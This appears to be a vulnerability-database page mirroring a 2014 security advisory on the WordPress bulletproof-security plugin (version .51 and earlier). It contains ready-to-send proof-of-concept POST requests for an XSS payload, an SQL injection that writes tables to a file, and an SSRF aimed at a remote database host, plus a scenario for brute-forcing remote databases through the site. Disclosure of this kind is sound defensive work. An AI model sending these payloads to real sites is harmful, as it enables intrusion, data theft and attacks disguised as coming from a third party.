Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormPietro OlivaPACKETSTORM:128977
HistoryNov 05, 2014 - 12:00 a.m.

WordPress Bulletproof-Security .51 XSS / SQL Injection / SSRF

2014-11-0500:00:00
Pietro Oliva
packetstormsecurity.com
32

0.003 Low

EPSS

Percentile

65.6%

JSON
`Vulnerability title: Wordpress bulletproof-security <=.51 multiple  
vulnerabilities  
Author: Pietro Oliva  
CVE: CVE-2014-7958, CVE-2014-7959, CVE-2014-8749  
Vendor: AITpro  
Product: bulletproof-security  
Affected version: bulletproof-security <= .51  
Vulnerabilities fixed in version: .51.1  
  
Details:  
  
  
xss vulnerability (CVE-2014-7958):  
  
POST /wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php  
HTTP/1.1  
  
dbname=&dbuser=&dbpassword=&dbhost=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&tableprefix=&username=&Login-Security-Unlock=Unlock+User+Account  
  
  
SQL injection vulnerability (CVE-2014-7959, correct db username and  
password is required in order to exploit this):  
  
POST /wordpress/wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php  
HTTP/1.1  
  
dbname=information_schema&dbuser=root&dbpassword=password&dbhost=&tableprefix=tables+into+outfile+'/tmp/tables'%3b+--+&username=&Login-Security-Unlock=Unlock+User+Account  
  
  
  
SSRF vulnerability (CVE-2014-8749)  
  
  
POST /wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php  
HTTP/1.1  
dbname=&dbuser=root&dbpassword&dbhost=remotedatabase.com&tableprefix=&username=&Login-Security-Unlock=Unlock+User+Account  
  
Possible scenario:  
  
- the user sends a request with username, password, host and other  
parameters to the vulnerable page  
- the server doesn't check the host parameter to be in a whitelist of  
permitted databases  
- the server performs an authentication request to a remote or  
internal network database and gives back to the attacker the  
authentication result  
-After n attemps the attacker has bypassed access restrictions (if  
any) to the remote database, discovered the remote database password,  
and made it appear bulletproof-security as the source of the attack.  
  
Extra step:  
-If the sql injection flaw (CVE-2014-7959) is not fixed, an attacker  
could also execute arbitrary sql statement on the remote server, as  
the vulnerable page executes a query if the authentication is  
successful (without filtering or use prepared statements). The source  
of the attack would appear to be the bulletproof-security vulnerable  
site.  
`

Related

securityvulns 2
zdt 1
wpvulndb 1
patchstack 3
prion 3
cve 3
securityvulns
securityvulns
Wordpress bulletproof-security &lt;=.51 multiple vulnerabilities
2014-12-01 00:00:00
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2014-12-01 00:00:00
zdt
zdt
WordPress Bulletproof-Security .51 Multiple Vulnerabilities
2014-11-06 00:00:00
wpvulndb
wpvulndb
BulletProof Security <= .51 - Multiple Vulnerabilities (XSS & SSRF)
2014-11-05 00:00:00
patchstack
patchstack
WordPress BulletProof Security Plugin <= .51 - SQL Injection
2014-10-07 00:00:00
WordPress BulletProof Security Plugin <= .51 - XSS
2014-10-07 00:00:00
WordPress BulletProof Security Plugin <= .51 - SSRF
2014-10-13 00:00:00
prion
prion
Sql injection
2014-11-06 15:55:00
Cross site scripting
2014-11-06 15:55:00
Server side request forgery (ssrf)
2014-12-01 15:59:00
cve
cve
CVE-2014-7959
2014-11-06 15:55:00
CVE-2014-7958
2014-11-06 15:55:00
CVE-2014-8749
2014-12-01 15:59:00

0.003 Low

EPSS

Percentile

65.6%

JSON
Related for PACKETSTORM:128977
securityvulns2zdt1wpvulndb1patchstack3prion3cve3